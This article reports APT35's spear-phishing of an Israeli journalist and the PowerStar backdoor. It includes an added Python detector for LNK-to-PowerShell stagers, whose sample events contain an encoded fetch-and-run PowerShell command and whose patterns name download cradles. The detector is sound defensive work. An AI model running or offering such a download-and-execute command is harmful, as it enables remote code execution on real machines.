
The Growing Cyber Threat: APT35’s Advanced Spear-Phishing Targets Israeli Media


APT35 Updates Cyberattack Arsenal, Targets Israeli Journalist in Spear-Phishing Campaign

Introduction

The Iran-linked advanced persistent threat group known as APT35, also referred to as Charming Kitten, Imperial Kitten, or Tortoiseshell, has recently enhanced its cyberattack capabilities. APT35 is alleged to be operating out of Iran and is primarily focused on collecting intelligence by compromising account credentials and targeting email accounts through spear-phishing campaigns. According to a blog post by cybersecurity firm Volexity, APT35 recently attempted a highly targeted attack on an Israeli journalist using a spear-phishing lure. This attack highlights the group’s use of sophisticated social engineering techniques and improved backdoor malware.

The Spear-Phishing Campaign

In this particular campaign, APT35 employed a “draft report” lure, targeting an Israeli journalist. The attackers initially contacted the victim, asking if they would be open to reviewing a document related to US foreign policy. The journalist, considering this a usual request in their line of work, agreed. However, instead of immediately sending the malicious document, the attackers continued the interaction with benign emails containing a list of questions. After multiple days of seemingly legitimate interaction, APT35 finally sent the “draft report” disguised as a password-protected RAR file. This file contained a malicious LNK file that downloaded a newly upgraded backdoor called PowerStar.

The PowerStar Malware

PowerStar is an updated version of one of APT35’s known backdoors, CharmPower. The spear-phishing email delivered an .LNK file inside a password-protected .RAR archive. When executed, the .LNK file downloaded PowerStar from the Backblaze hosting provider and from attacker-controlled infrastructure. PowerStar collects system information from the compromised machine and sends it to a command-and-control (C2) address. Volexity believes this variant of PowerStar to be particularly complex and suspects the existence of a custom server-side component supporting it. This component automates simple actions for the malware operator and, through a kill switch, lets the attacker prevent future analysis of the malware’s key functionality.
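To make the delivery chain described in the two sections above (password-protected RAR, user-launched LNK, PowerShell backdoor fetched from a cloud hosting provider) concrete from the defender's side, here is an added example; it is not code from Volexity or from the original article. It scores Sysmon-style process-creation events reduced to dicts; the interactive-parent list, the regexes, the Backblaze URL and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Parents that mean a user double-clicked something: Explorer, or an archiver
# opening the LNK straight out of the RAR. (Assumed list, not from the article.)
INTERACTIVE_PARENTS = {"explorer.exe", "winrar.exe", "7zfm.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-cradle markers commonly seen in one-line PowerShell stagers.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                    r"Net\.WebClient|Invoke-Expression|\biex\b", re.I)
# File-hosting domains to scrutinise: backblazeb2.com is Backblaze's public
# domain, example-cdn.test is a constructed placeholder.
HOSTING = re.compile(r"https?://[^\s\"']*(backblazeb2\.com|example-cdn\.test)", re.I)
ENC = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def expand_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    cradle and URL checks also see what an encoded stager actually runs."""
    m = ENC.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd

def score_event(ev: dict) -> list:
    """Return the reasons an event looks like the LNK -> PowerShell ->
    cloud-hosted download stage; an empty list means no match."""
    reasons = []
    parent = ev.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS and image in POWERSHELL:
        reasons.append("powershell spawned from interactive parent")
    raw = ev.get("command_line", "")
    cmd = expand_command(raw)
    if CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if HOSTING.search(cmd):
        reasons.append("fetch from file-hosting domain")
    if ENC.search(raw):
        reasons.append("encoded command")
    return reasons

# Constructed sample events (not real telemetry): one LNK-style chain and one
# benign service-launched admin script for contrast.
_STAGER = "iex (New-Object Net.WebClient).DownloadString('https://f000.backblazeb2.com/file/b/report.ps1')"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc " + base64.b64encode(_STAGER.encode("utf-16-le")).decode()},
    {"parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\ops\\rotate-logs.ps1"},
]
```

Feeding real Sysmon Event ID 1 records through `score_event` and alerting when two or more reasons fire keeps the noise from ordinary interactive PowerShell use down while still catching the encoded, cloud-fetched stager shape.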

The Quest for Return on Investment

According to Toby Lewis, the global head of threat analysis at Darktrace, APT35’s targeting profile aligns with expectations of an Iranian government-affiliated group. He emphasizes the group’s focus on being bespoke, stealthy, and under the radar, which leads them to invest heavily in social engineering techniques to maximize success rates. Lewis notes that APT groups vary in sophistication, with some developing zero-day exploits, while others demonstrate sophistication in how they manage and control their infrastructure. APT35 falls into the latter category, utilizing custom payloads and different modules from third-party services. This adaptive approach makes it harder to detect and track their attacks.

Rare Use of Malware

Volexity researchers have noticed that APT35 rarely deploys malware in their operations. They believe this sparing use of malware increases the difficulty of tracking their attacks. The group has been active for over a decade and has launched extensive campaigns against organizations and officials across North America and the Middle East. Public attribution has identified APT35 as an Iran-based nation-state threat actor. Recent campaigns indicate potential physical targeting, such as kidnapping and other kinetic operations, related to Iran’s activities against dissenters.

Conclusion

APT35, an Iran-linked advanced persistent threat group, has recently updated its cyberattack arsenal and used spear-phishing tactics to target an Israeli journalist. The group’s sophisticated social engineering techniques and use of improved backdoor malware highlight their efforts to remain stealthy and under the radar. APT35’s approach includes delivering custom payloads, employing different modules from third-party services, and limiting the use of easily detectable malware. These tactics make it challenging to attribute attacks to the group and track their activities effectively. As state-sponsored threat actors continue to evolve, organizations and individuals must maintain constant vigilance, ensure robust cybersecurity measures, and exercise caution in their online interactions to mitigate the risk of falling victim to cyberattacks.
